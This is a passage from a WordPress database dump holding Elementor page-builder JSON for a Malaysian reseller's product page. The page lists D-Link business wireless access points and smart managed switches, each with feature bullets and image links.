]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7614,3416,'_elementor_version','2.5.14'),(7615,3416,'_elementor_edit_mode','builder'),(7618,3417,'_wp_page_template','template-fullwidth.php'),(7619,3417,'_elementor_template_type','post'),(7620,3417,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" 